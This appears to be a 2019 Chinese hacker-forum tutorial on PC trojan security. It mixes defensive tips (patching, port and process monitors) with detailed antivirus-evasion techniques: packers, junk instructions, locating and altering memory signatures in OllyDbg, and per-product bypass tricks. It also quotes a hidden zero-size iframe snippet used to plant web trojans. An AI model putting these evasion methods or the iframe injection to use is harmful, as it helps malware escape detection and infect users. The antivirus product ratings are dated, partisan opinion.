个人计算机终极安全-木马特讲
发布时间:2019-05-12

个人计算机终极安全-木马特讲   
  本教程内容由浅到深,请耐心观看.
  在这,先给大家几个忠告
别以为打系统补丁是没用的,如果不打你的电脑随时可能中网马,网马就是利用系统的重大BUG俗称(漏洞)制作而成的,当你浏览网页时,由于你的系统没有打补丁,就会自动下载并运行文件,该文件可能是反弹木马,或者是病毒.
网页插木马常见代码(<iframe src="http://www.***.com/mm.htm" name="zhu" width="0" height="0" frameborder="0">) 意思就是打开一个宽高为0的窗口 所以用户看不到的
别以为装了杀毒或者防火墙就一了百了,虽然装了比没装好,但是也要装个比较好的杀毒才有用,没有杀毒能够绝对的预防病毒木马,简单的免杀可以非常简单地让杀毒软件什么也查不出,最好还是自己看端口.看服务,学会用一些工具才是真正地防木马.
暗组提示:《推荐1.杀毒:文件扫描 《卡巴斯基》 、内存扫描 《瑞星》 2.防火墙:《天网防火墙》(支持国产的)》
  
几个专业名词
  壳:就是程序的保护层,原本用来加密PE程序文件防止破解,现在却被用于制作免杀
花代码(花指令):就是一段毫无意义的代码,也是乱码,它前后构成完全矛盾的意思,但是这样就能阻碍杀毒软件的查杀.
现金国内主要杀毒技术
特征码技术:运用程序中某一段或几段64字节以下的代码作为判别程序病毒的主要依据,几乎所有国内杀毒软件都在用.
复合特征码技术:下面给图, 因为本人艺术细胞原因 所以点到为止
abcd 所有都在的情况下, 木马可以被杀到 不管有几个a 或者几个b
虚拟机技术:卡巴运用的技术,它表现在穿壳能力的强大
行为查杀技术:根据某些病毒会在计算机里面的行为作为依据(如在注册表内增加什么键值),满足三个以上就视为木马或病毒.
启发式杀毒技术:运用病毒特有的结构,来检测病毒(如nod32)
国内外部分杀毒软件的特点:
    金山:超级垃圾的杀毒软件,花哨东西多得要死,实际杀毒功能却属于世界数一数二地弱,如果不想中木马,你最好别装.它甚至连木马也杀不清
    江民或KV:跟金山差不多,稍微比它好点,但是也比较垃圾,它的技术都是买来经过二次改造,没什么特色.
    瑞星:个人认为是国内是国内出的最强地杀毒,经过分析,它有三套毒库
  瑞星的内存杀毒我们也搞不清楚内核机制,所以分析的只是现象:
  1、普通的木马病毒(不常见的),瑞星不进行内存特征码定义,,
  文件免杀了内存就免杀了
  2、瑞星的右键快捷查杀和运行主程序查杀,效果不一样,右键不杀不代
  表运行主程序不杀,有些内存杀的木马病毒,修改了运行主程序查杀的特
  征码,内存就免杀了。网络泛滥的木马病毒(如鸽子,密码神通,广外幽灵等),瑞星进行内存特征码定义,通常是多区段特征码定义,其中有些用免杀壳加密加花后,OD载入不杀,但运行后被杀
  这样看来感觉瑞星象是3套特征码定义,1是右键查杀,2是主程序运行查杀,
  3是内存查杀,我是这样分类的
  针对上述现象,瑞星内存免杀我们通常这样做,OD分段定位,先NOP入口点区段,仍被杀则NOP其他区段,直到不杀,找出内存特征码进行修改

  
  说明:A B  C代表的是病毒特征码,括号()表示可能不存在
  
  关于OD加载入内存不杀,运行后被内存查杀的问题:
  OD加载的和真正的运行有区别,一些加壳的东西加了木马OD载入不杀内存,真正运行了就被杀,说明真正运行了内存中会还原某些代码,所以遇到加壳OD不杀,运行被杀的情况,平时我们遇到的木马,未加密加壳前在OD中是可以被杀和定位内存特征码的至于一种情况,如果木马未做任何处理的时候,就是一个原始木马,拿来OD载入不杀内存,运行了就杀,这种情况我没遇到过,如果你遇到了无壳的出现这种情况,基本上就是被一个内存免杀技术不过关的人修改过的,碰巧被你用了
  如果你在免杀过程中遇到了OD载入不杀,运行内存被杀的情况,请尝试修改
  特征码,而不是给它加花或加密,正确修改了内存特征码是可以完全内存免杀的
以上就是黑客小熊所分析的瑞星,瑞星不是用来实时监控,是用来手动查杀内存用的.
   诺顿:它查杀的是PE文件头,就是那一串代码,有一个加壳程序可以把它打乱,高技术的甚至可以把它整个移走以免杀.
    卡巴斯基:国内外数一数二的杀毒软件,曾获世界第一的称号.它的优点就是穿壳能力墙(虚拟机技术),弱点是一见花指令就怕.免杀它一般是加花指令.
    NOD32:启发式杀毒技术,不再是单纯的特征码技术,就是运用一些木马程序特有的结构来判别是否木马,但是缺点是解密能力差,免杀它通常加一个壳再加一个花.
   Ewido:一款非常不错的杀木马软件,它的内存查杀和瑞星一样变态,而且穿花能力强,比起国内木马克星来说它不知道好多少倍.而且他加入了注册表查杀,免杀它要先过内存再加强壳
运用软件进行端口及进程防御
  冰刃:用于查看隐藏端口,进程,服务等,是一个非常好的安全工具.
  端口关联查看器:看端口工具.
  木马辅助查找器:灰鸽子工作室出品,用于监视文件.
  Regmon注册表监视器:用来监视注册表.
  Filemon文件监视器,用来查看文件调用的所有DLL
一个杀毒检测的网站
  http://www.virustotal.com/
  
  编者:***                                  文档整理:New4
  
  版权归暗组所有:www.darkst.com              技术文章转载请注明来自暗组技术论坛

公司名称:六安市金狮网络技术有限公司
公司地址:安徽省六安市金安区皖西大道红叶大厦802A
联系电话:0564-3214800 手机:13956148092 邮箱:120907442@qq.com QQ:120907442 / 1099497647
手机访问